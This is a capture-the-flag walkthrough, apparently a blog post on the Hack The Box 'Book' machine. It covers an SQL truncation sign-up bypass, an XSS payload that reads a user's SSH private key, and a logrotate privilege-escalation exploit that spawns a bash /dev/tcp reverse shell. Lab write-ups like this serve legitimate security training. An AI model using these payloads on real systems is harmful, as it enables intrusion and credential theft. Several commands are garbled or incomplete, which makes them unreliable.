HTB Walkthrough Book



After the Nmap scan we see there are only 2 ports open. after poking around we discover the sign up page is vulnerable to an SQL truncation Attack


Once we are logged into the admin and normal site we discover an XSS vulnerability, cause this vulnerability we were able to get the id_rsa key and login to the box


After some enumeration we discover there is a vulnerability in the log rotate application after exploiting this we were able to take over the machine completely.



nmap -sC -sV -p-


Turns out it’s vulnerable to sql truncation:

intercepting this request with burp so we can edit it and use the sql truncation attack:



XSS attack

<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText.fontsize(1)) };"GET","file:///home/reader/.ssh/id_rsa"); x.send(); </script>

open the collections

and we get our rsa key:

Note: of course we did some more enum with our LFI, thats why we know we need reader as user.

chmod 600 id_rsa

Privilege Escalation

After some enumeration it turns out we found the folowing vulnerability

compile exploit:

gcc -o exploit exploit.c

create a bash script with reversed shell:


bash -i >& /dev/tcp/ 0>&1

nc -lvp 443

./exploit -p /home/reader/backups/access.log

to speed things a bit up I login with another shell and execute the folowing command to trigger the log rotation

echo rotateme >> /home/reader/backups/access.log

shell was unstable so since there is a id_rsa key I decided to grab that one when the root shell popped up

chmod + 600 root_id

ssh -i root_id root@

Made by s3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.

Leave a Reply